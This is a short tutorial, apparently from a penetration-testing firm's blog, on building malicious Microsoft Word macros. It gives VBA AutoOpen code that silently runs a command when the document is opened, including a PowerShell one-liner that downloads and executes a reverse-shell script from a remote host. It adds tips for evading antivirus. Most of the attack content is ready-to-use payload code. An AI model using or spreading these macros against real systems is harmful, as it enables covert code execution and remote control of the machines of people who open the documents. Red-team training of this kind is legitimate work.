Microsoft Word Macro Payload

By Jobyer Ahmed

[toc]

Delivering reverse shell payload via the office macro is old but still works if you can bypass AV. 

Get your code ready

Start Microsoft Office 2016 Pro Plus and Go View Tab and Click Macros>View Macros
Microsoft Word Macro Payload

Give a macro name, Select Macros in Document1 and Click CreateMicrosoft Word Macro Payload

Paste the below code and save as Word Macro-Enabled Document or Word 97-2003 Document

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "calc.exe"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub

Execute

Open the document and click Enable Content and we will have calc.exe opened!

Microsoft Word Macro Payload
Microsoft Word Macro Payload

Simple Downloader

In this way we can execute any command, such as powershell iwr …:

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "powershell.exe -exec bypass -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/RevShell.ps1')"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub

Tips to bypass AV

  1. Encode/Encrypt the powershell command
  2. Unhook Powershell.exe

RedNode Joins Forces with Korea’s NationalWin

Preventing Frequent Cyber Attacks in Bangladesh

REDNODE

A fast-growing cybersecurity service provider that offers customized security testing solutions to protect any size of business worldwide.

Resources

News

Penetration Testing

Red Teaming

Web Pentest

Links

About Us

Services

Our promise

Contact us

Phone: +8801836830755

Email: [email protected]

35/2, 7th floor, Monipori Para, Khamar Bari
Tejgaon, Dhaka-1200, Bangladesh

132/10, Dhap, Rangpur, Bangladesh

© 2024 RedNode Services Ltd. All rights reserved

Privacy Policy